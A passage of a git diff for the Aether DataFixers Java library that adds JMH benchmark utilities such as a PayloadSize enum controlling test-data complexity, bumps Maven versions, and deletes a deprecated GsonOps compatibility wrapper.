+ * + * @param builder the TestDataBuilder to add the nested structure to + * @param key the field name for this nested object + * @param depth remaining nesting levels (stops when depth reaches 0) + * @param the underlying value type of the builder + */ + private static void addNestedObject(final TestDataBuilder builder, + final String key, + final int depth) { + if (depth <= 0) { + return; + } + builder.putObject(key, nested -> { + nested.put("level", depth); + nested.put("data", "nested-level-" + depth); + nested.put("timestamp", FIXED_TIMESTAMP); + addNestedObject(nested, "child", depth - 1); + }); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java new file mode 100644 index 0000000..13b56f3 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java @@ -0,0 +1,208 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.util; + +/** + * Defines payload size configurations for benchmark test data generation. + * + *

This enum controls the complexity of data generated by {@link BenchmarkDataGenerator#generate(de.splatgames.aether.datafixers.api.dynamic.DynamicOps, PayloadSize)}. Each configuration specifies three dimensions of data complexity:

  • Field count: Number of primitive fields (string, int, boolean triplets)
  • Nesting depth: Levels of nested object recursion
  • List size: Number of items in the generated list

Configuration Summary

Size | Fields | Nesting | List Items | Use Case
{@link #SMALL} | 5 | 2 levels | 10 | Quick iterations, CI pipelines
{@link #MEDIUM} | 20 | 4 levels | 100 | Typical performance testing
{@link #LARGE} | 50 | 6 levels | 1000 | Stress testing, worst-case analysis

JMH Parameterization


This enum is designed for use with JMH's {@code @Param} annotation:

{@code
@Param({"SMALL", "MEDIUM", "LARGE"})
private PayloadSize payloadSize;

@Setup(Level.Iteration)
public void setup() {
    this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, payloadSize);
}
}

Memory and Performance Impact


Approximate data characteristics for each size:

Size | ~JSON Size | ~Object Count | Typical Latency
SMALL | ~2 KB | ~50 | Sub-millisecond
MEDIUM | ~20 KB | ~500 | Low milliseconds
LARGE | ~200 KB | ~5000 | Tens of milliseconds
+ * + * @author Erik Pförtner + * @see BenchmarkDataGenerator + * @since 1.0.0 + */ +public enum PayloadSize { + + /** + * Small payload configuration for quick benchmark iterations. + * + *

Generates minimal data suitable for:

  • Rapid development feedback loops
  • CI/CD pipeline validation
  • Baseline measurements with minimal GC impact

Configuration: 5 fields, 2 nesting levels, 10 list items

+ */ + SMALL(5, 2, 10), + + /** + * Medium payload configuration for balanced performance testing. + * + *

Generates moderately complex data suitable for:

  • Standard benchmark runs
  • Typical real-world data volume simulation
  • Comparing different implementations

Configuration: 20 fields, 4 nesting levels, 100 list items

+ */ + MEDIUM(20, 4, 100), + + /** + * Large payload configuration for stress testing and worst-case analysis. + * + *

Generates substantial data suitable for:

  • Memory pressure and GC behavior analysis
  • Worst-case performance scenarios
  • Scalability limit identification

Configuration: 50 fields, 6 nesting levels, 1000 list items


Note: Large payloads may require increased heap size and longer warmup periods for stable measurements.

+ */ + LARGE(50, 6, 1000); + + /** + * Number of primitive field triplets (string, int, boolean) to generate. + */ + private final int fieldCount; + + /** + * Maximum depth of nested object recursion. + */ + private final int nestingDepth; + + /** + * Number of items in the generated list. + */ + private final int listSize; + + /** + * Constructs a payload size configuration. + * + * @param fieldCount number of top-level field triplets + * @param nestingDepth maximum nesting levels for nested objects + * @param listSize number of items in generated lists + */ + PayloadSize(final int fieldCount, final int nestingDepth, final int listSize) { + this.fieldCount = fieldCount; + this.nestingDepth = nestingDepth; + this.listSize = listSize; + } + + /** + * Returns the number of primitive field triplets to generate. + * + *

Each field "count" results in three actual fields:

  • {@code stringFieldN} - String value
  • {@code intFieldN} - Integer value
  • {@code boolFieldN} - Boolean value
+ * + * @return the number of field triplets (total fields = fieldCount × 3) + */ + public int getFieldCount() { + return this.fieldCount; + } + + /** + * Returns the maximum nesting depth for recursive nested objects. + * + *
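
For example, assuming the MEDIUM configuration documented above, a quick sanity check of the resulting data volume:

{@code
PayloadSize size = PayloadSize.MEDIUM;
int primitiveFields = size.getFieldCount() * 3; // 20 triplets -> 60 primitive fields
int nestingLevels = size.getNestingDepth();     // 4
int listItems = size.getListSize();             // 100
}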

A depth of N creates N levels of nested objects, each containing a "child" field pointing to the next level until depth reaches 0.

+ * + * @return the maximum nesting depth (0 = no nesting) + */ + public int getNestingDepth() { + return this.nestingDepth; + } + + /** + * Returns the number of items to generate in the "items" list. + * + *

Each item is an object with id, quantity, and active fields.

+ * + * @return the number of list items + */ + public int getListSize() { + return this.listSize; + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java new file mode 100644 index 0000000..5673ed4 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java @@ -0,0 +1,138 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Utility classes for JMH benchmark infrastructure in the Aether DataFixers framework. + * + *

This package provides the foundational components that all benchmark classes depend on for test data generation, DataFixer configuration, and payload management. These utilities ensure consistent, reproducible benchmark conditions across different benchmark categories.


Package Contents

Class | Purpose | Used By
{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap} | Factory for pre-configured DataFixer instances | All migration benchmarks
{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator} | Factory for generating test data with configurable complexity | All benchmarks requiring input data
{@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize} | Configuration enum for data complexity levels | JMH {@code @Param} annotations

Design Principles

  • Isolation: Utilities are stateless and thread-safe for concurrent benchmark use
  • Consistency: All benchmarks use the same data generation logic for fair comparisons
  • Configurability: {@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize} allows parameterized benchmarks with different data volumes
  • No-op context: All DataFixers use {@code NoOpDataFixerContext} to eliminate logging overhead during measurements

Typical Usage Pattern

{@code
@State(Scope.Benchmark)
public class MyBenchmark {

    @Param({"SMALL", "MEDIUM", "LARGE"})
    private PayloadSize payloadSize;

    private DataFixer fixer;
    private Dynamic input;

    @Setup(Level.Trial)
    public void setupTrial() {
        // Create fixer once per trial
        this.fixer = BenchmarkBootstrap.createChainFixer(10);
    }

    @Setup(Level.Iteration)
    public void setupIteration() {
        // Regenerate data each iteration for consistent GC behavior
        this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, payloadSize);
    }

    @Benchmark
    public void migrate(Blackhole blackhole) {
        Dynamic result = fixer.update(
            BenchmarkBootstrap.BENCHMARK_TYPE,
            input,
            new DataVersion(1),
            new DataVersion(11)
        );
        blackhole.consume(result);
    }
}
}

Data Fixer Configurations


{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap} provides several DataFixer configurations for different benchmark scenarios:

Configuration | Fix Count | Purpose
Single Fix | 1 | Baseline single-operation performance
Identity | 1 (no-op) | Framework overhead measurement
Chain (N) | 1-100 | Chain length scaling analysis
Mixed (N) | 4+ | Realistic heterogeneous migrations
Player | 4 | Domain-specific scenario testing

Payload Size Configurations


{@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize} defines three complexity levels for generated test data:

Size | Fields | Nesting | List Items | Use Case
SMALL | 5 | 2 | 10 | Quick iterations, CI
MEDIUM | 20 | 4 | 100 | Standard testing
LARGE | 50 | 6 | 1000 | Stress testing

Integration with Testkit


This package builds upon the {@code aether-datafixers-testkit} module:

  • {@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator} uses {@code TestDataBuilder} for fluent data construction
  • {@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap} uses {@code QuickFix} for efficient fix creation
  • Both utilities leverage {@code MockSchemas} for lightweight schema instances
+ * + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator + * @see de.splatgames.aether.datafixers.benchmarks.util.PayloadSize + * @see de.splatgames.aether.datafixers.testkit + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.util; diff --git a/aether-datafixers-bom/pom.xml b/aether-datafixers-bom/pom.xml index e736522..e8627a7 100644 --- a/aether-datafixers-bom/pom.xml +++ b/aether-datafixers-bom/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-bom diff --git a/aether-datafixers-cli/pom.xml b/aether-datafixers-cli/pom.xml index 2b8a30e..a54c951 100644 --- a/aether-datafixers-cli/pom.xml +++ b/aether-datafixers-cli/pom.xml @@ -7,7 +7,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-cli @@ -180,7 +180,7 @@ org.codehaus.mojo exec-maven-plugin - 3.1.0 + 3.6.3 ${main.class} diff --git a/aether-datafixers-codec/pom.xml b/aether-datafixers-codec/pom.xml index 5d48923..f0b96d8 100644 --- a/aether-datafixers-codec/pom.xml +++ b/aether-datafixers-codec/pom.xml @@ -6,7 +6,7 @@ de.splatgames.aether.datafixers aether-datafixers - 0.5.0 + 1.0.0-SNAPSHOT aether-datafixers-codec diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java deleted file mode 100644 index 55df6ee..0000000 --- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java +++ /dev/null @@ -1,737 +0,0 @@ -/* - * Copyright (c) 2025 Splatgames.de Software and Contributors - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - * SOFTWARE. 
- */
-
-package de.splatgames.aether.datafixers.codec.gson;
-
-import com.google.common.base.Preconditions;
-import com.google.gson.JsonArray;
-import com.google.gson.JsonElement;
-import com.google.gson.JsonNull;
-import com.google.gson.JsonObject;
-import com.google.gson.JsonPrimitive;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
-import de.splatgames.aether.datafixers.api.result.DataResult;
-import de.splatgames.aether.datafixers.api.util.Pair;
-import org.jetbrains.annotations.NotNull;
-import org.jspecify.annotations.Nullable;
-
-import java.util.stream.Stream;
-
-/**
- * Backwards-compatibility wrapper for {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}.
- *
- * <p>This class provides API compatibility for code written against the pre-0.4.0 package structure.
- * It delegates all operations to the new {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * implementation in the reorganized package hierarchy.</p>
- *
- * <h2>Migration Guide</h2>
- *
- * <p>To migrate to the new API, update your imports:</p>
- *
- * <pre>{@code
- * // Old import (deprecated)
- * import de.splatgames.aether.datafixers.codec.gson.GsonOps;
- *
- * // New import (recommended)
- * import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
- * }</pre>
- *
- * <h2>Removal Timeline</h2>
- *
- * <p>This class is scheduled for removal in version 1.0.0. All functionality remains
- * fully operational until removal, but users should migrate to the new package structure
- * at their earliest convenience.</p>
- *
- * <h2>Delegation Pattern</h2>
- *
- * <p>This wrapper implements the delegation pattern, forwarding all method calls to the
- * underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance.
- * This ensures identical behavior between the deprecated and new implementations.</p>
- *
- * <h2>Thread Safety</h2>
- *
- * <p>This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared
- * across multiple threads, as the underlying implementation is also thread-safe.</p>
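- *
- * <p>Typical usage is unchanged from the new implementation; for example
- * (an illustrative sketch consistent with the package documentation,
- * {@code jsonElement} being any Gson {@link JsonElement} value):</p>
- *
- * <pre>{@code
- * // Behaves identically whether the old or the new GsonOps is imported.
- * GsonOps ops = GsonOps.INSTANCE;
- * Dynamic<JsonElement> dynamic = new Dynamic<>(ops, jsonElement);
- * }</pre>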
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
- * @see DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- *             from the {@code codec.json.gson} package instead. This class will be removed
- *             in version 1.0.0 as part of the package reorganization.
- */
-@Deprecated(forRemoval = true, since = "0.4.0")
-public class GsonOps implements DynamicOps<JsonElement> {
-
-    /**
-     * The singleton instance of the deprecated {@code GsonOps} wrapper.
-     *
-     * <p>This instance wraps {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE}
-     * and provides full backwards compatibility. It is thread-safe and can be shared across
-     * the entire application.</p>
-     *
-     * <h2>Migration</h2>
-     *
-     * <p>Replace usages with:</p>
-     *
-     * <pre>{@code
-     * // Old usage (deprecated)
-     * GsonOps.INSTANCE
-     *
-     * // New usage (recommended)
-     * de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE
-     * }</pre>
-     *
-     * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE} instead.
-     */
-    @Deprecated(forRemoval = true, since = "0.4.0")
-    public static final GsonOps INSTANCE = new GsonOps(de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE);
-
-    /**
-     * The underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance
-     * to which all operations are delegated.
-     *
-     * <p>This field holds the actual implementation that performs all DynamicOps operations.
-     * The wrapper simply forwards all method calls to this instance, ensuring behavioral
-     * equivalence between the deprecated and new implementations.</p>
-     */
-    private final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps;
-
-    /**
-     * Creates a new deprecated {@code GsonOps} wrapper delegating to the specified base implementation.
-     *
-     * <p>This constructor allows wrapping any {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
-     * instance, though typically the singleton {@link #INSTANCE} should be used instead.</p>
-     *
-     * <h2>Usage</h2>
-     *
-     * <pre>{@code
-     * // Typically use the singleton instead
-     * GsonOps ops = GsonOps.INSTANCE;
-     *
-     * // Or wrap a custom instance if needed
-     * GsonOps customOps = new GsonOps(
-     *     de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE
-     * );
-     * }</pre>
-     *
-     * @param baseOps the base {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
-     *                instance to delegate all operations to; must not be {@code null}
-     * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} directly instead.
-     */
-    @Deprecated(forRemoval = true, since = "0.4.0")
-    private GsonOps(@NotNull final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps) {
-        Preconditions.checkNotNull(baseOps, "baseOps must not be null");
-        this.baseOps = baseOps;
-    }
-
-    // ==================== Empty/Null Values ====================
-
-    /**
-     * {@inheritDoc}
-     *

Returns the canonical empty/null representation for Gson JSON data, - * which is {@link JsonNull#INSTANCE}. This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#empty()} method.

- * - * @return {@link JsonNull#INSTANCE} representing the absence of a value - */ - @NotNull - @Override - public JsonElement empty() { - return this.baseOps.empty(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON object ({@code {}}). This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyMap()} method.

- * - * @return a new empty {@link JsonObject} instance - */ - @NotNull - @Override - public JsonElement emptyMap() { - return this.baseOps.emptyMap(); - } - - /** - * {@inheritDoc} - * - *

Returns an empty JSON array ({@code []}). This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyList()} method.

- * - * @return a new empty {@link JsonArray} instance - */ - @NotNull - @Override - public JsonElement emptyList() { - return this.baseOps.emptyList(); - } - - // ==================== Type Checking ==================== - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a map/object structure. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isMap(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonObject}, {@code false} otherwise - */ - @Override - public boolean isMap(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isMap(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a list/array structure. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isList(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonArray}, {@code false} otherwise - */ - @Override - public boolean isList(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isList(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a string primitive. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isString(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonPrimitive} containing a string, - * {@code false} otherwise - */ - @Override - public boolean isString(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isString(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a numeric primitive. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isNumber(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonPrimitive} containing a number, - * {@code false} otherwise - */ - @Override - public boolean isNumber(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isNumber(value); - } - - /** - * {@inheritDoc} - * - *

Checks whether the given JSON element is a boolean primitive. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isBoolean(JsonElement)} method.

- * - * @param value the JSON element to check; must not be {@code null} - * @return {@code true} if the value is a {@link JsonPrimitive} containing a boolean, - * {@code false} otherwise - */ - @Override - public boolean isBoolean(@NotNull final JsonElement value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.isBoolean(value); - } - - // ==================== Primitive Creation ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON string primitive from the given string value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createString(String)} method.

- * - * @param value the string value to wrap; must not be {@code null} - * @return a new {@link JsonPrimitive} containing the string - */ - @NotNull - @Override - public JsonElement createString(@NotNull final String value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createString(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given integer value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createInt(int)} method.

- * - * @param value the integer value to wrap - * @return a new {@link JsonPrimitive} containing the integer - */ - @NotNull - @Override - public JsonElement createInt(final int value) { - return this.baseOps.createInt(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given long value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createLong(long)} method.

- * - * @param value the long value to wrap - * @return a new {@link JsonPrimitive} containing the long - */ - @NotNull - @Override - public JsonElement createLong(final long value) { - return this.baseOps.createLong(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given float value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createFloat(float)} method.

- * - * @param value the float value to wrap - * @return a new {@link JsonPrimitive} containing the float - */ - @NotNull - @Override - public JsonElement createFloat(final float value) { - return this.baseOps.createFloat(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given double value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createDouble(double)} method.

- * - * @param value the double value to wrap - * @return a new {@link JsonPrimitive} containing the double - */ - @NotNull - @Override - public JsonElement createDouble(final double value) { - return this.baseOps.createDouble(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given byte value. - * Since JSON has no distinct byte type, the value is stored as a number. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createByte(byte)} method.

- * - * @param value the byte value to wrap - * @return a new {@link JsonPrimitive} containing the byte as a number - */ - @NotNull - @Override - public JsonElement createByte(final byte value) { - return this.baseOps.createByte(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given short value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createShort(short)} method.

- * - * @param value the short value to wrap - * @return a new {@link JsonPrimitive} containing the short - */ - @NotNull - @Override - public JsonElement createShort(final short value) { - return this.baseOps.createShort(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON boolean primitive from the given boolean value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createBoolean(boolean)} method.

- * - * @param value the boolean value to wrap - * @return a new {@link JsonPrimitive} containing the boolean - */ - @NotNull - @Override - public JsonElement createBoolean(final boolean value) { - return this.baseOps.createBoolean(value); - } - - /** - * {@inheritDoc} - * - *

Creates a JSON numeric primitive from the given {@link Number} value. - * The specific numeric type is preserved in the underlying JSON representation. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createNumeric(Number)} method.

- * - * @param value the number value to wrap; must not be {@code null} - * @return a new {@link JsonPrimitive} containing the number - */ - @NotNull - @Override - public JsonElement createNumeric(@NotNull final Number value) { - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.createNumeric(value); - } - - // ==================== Primitive Reading ==================== - - /** - * {@inheritDoc} - * - *

Extracts the string value from a JSON element. The element must be a - * {@link JsonPrimitive} containing a string value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getStringValue(JsonElement)} method.

- * - * @param input the JSON element to extract the string from; must not be {@code null} - * @return a {@link DataResult} containing the string value on success, - * or an error if the element is not a string primitive - */ - @NotNull - @Override - public DataResult getStringValue(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getStringValue(input); - } - - /** - * {@inheritDoc} - * - *

Extracts the numeric value from a JSON element. The element must be a - * {@link JsonPrimitive} containing a numeric value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getNumberValue(JsonElement)} method.

- * - * @param input the JSON element to extract the number from; must not be {@code null} - * @return a {@link DataResult} containing the {@link Number} value on success, - * or an error if the element is not a numeric primitive - */ - @NotNull - @Override - public DataResult getNumberValue(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getNumberValue(input); - } - - /** - * {@inheritDoc} - * - *

Extracts the boolean value from a JSON element. The element must be a - * {@link JsonPrimitive} containing a boolean value. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getBooleanValue(JsonElement)} method.

- * - * @param input the JSON element to extract the boolean from; must not be {@code null} - * @return a {@link DataResult} containing the boolean value on success, - * or an error if the element is not a boolean primitive - */ - @NotNull - @Override - public DataResult getBooleanValue(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getBooleanValue(input); - } - - // ==================== List Operations ==================== - - /** - * {@inheritDoc} - * - *

Creates a JSON array from a stream of JSON elements. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createList(Stream)} method.

- * - * @param values the stream of JSON elements to include in the array; must not be {@code null} - * @return a new {@link JsonArray} containing all elements from the stream - */ - @NotNull - @Override - public JsonElement createList(@NotNull final Stream values) { - Preconditions.checkNotNull(values, "values must not be null"); - return this.baseOps.createList(values); - } - - /** - * {@inheritDoc} - * - *

Extracts the elements of a JSON array as a stream. The input must be a - * {@link JsonArray}. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getList(JsonElement)} method.

- * - * @param input the JSON element to extract list elements from; must not be {@code null} - * @return a {@link DataResult} containing a stream of the array elements on success, - * or an error if the input is not a JSON array - */ - @NotNull - @Override - public DataResult> getList(@NotNull final JsonElement input) { - Preconditions.checkNotNull(input, "input must not be null"); - return this.baseOps.getList(input); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON array by appending a value to an existing array. - * The original array is not modified; a deep copy is created. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToList(JsonElement, JsonElement)} method.

- * - * @param list the existing JSON array to append to; must not be {@code null} - * @param value the JSON element to append; must not be {@code null} - * @return a {@link DataResult} containing the new array with the appended value on success, - * or an error if the list is not a JSON array - */ - @NotNull - @Override - public DataResult mergeToList(@NotNull final JsonElement list, @NotNull final JsonElement value) { - Preconditions.checkNotNull(list, "list must not be null"); - Preconditions.checkNotNull(value, "value must not be null"); - return this.baseOps.mergeToList(list, value); - } - - // ==================== Map Operations ==================== - - /** - * {@inheritDoc} - * - *

Retrieves the value associated with a key from a JSON object. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#get(JsonElement, String)} method.

- * - * @param value the JSON object to retrieve from; must not be {@code null} - * @param key the key to look up; must not be {@code null} - * @return the JSON element associated with the key, or {@code null} if not present - * or if the input is not a JSON object - */ - @Override - public @Nullable JsonElement get(@NotNull final JsonElement value, @NotNull final String key) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - return this.baseOps.get(value, key); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field set to the specified value. - * If the input is a JSON object, a deep copy is created with the field updated. - * If the input is not a JSON object, a new object is created containing only the specified field. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#set(JsonElement, String, JsonElement)} method.

- * - * @param value the JSON element to modify; must not be {@code null} - * @param key the key for the field to set; must not be {@code null} - * @param newValue the value to associate with the key; must not be {@code null} - * @return a new {@link JsonObject} with the field set to the specified value - */ - @NotNull - @Override - public JsonElement set(@NotNull final JsonElement value, @NotNull final String key, @NotNull final JsonElement newValue) { - Preconditions.checkNotNull(value, "value must not be null"); - Preconditions.checkNotNull(key, "key must not be null"); - Preconditions.checkNotNull(newValue, "newValue must not be null"); - return this.baseOps.set(value, key, newValue); - } - - /** - * {@inheritDoc} - * - *

Creates a new JSON object with a field removed. - * A deep copy of the input object is created without the specified field. - * This delegates to the underlying - * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#remove(JsonElement, String)} method.

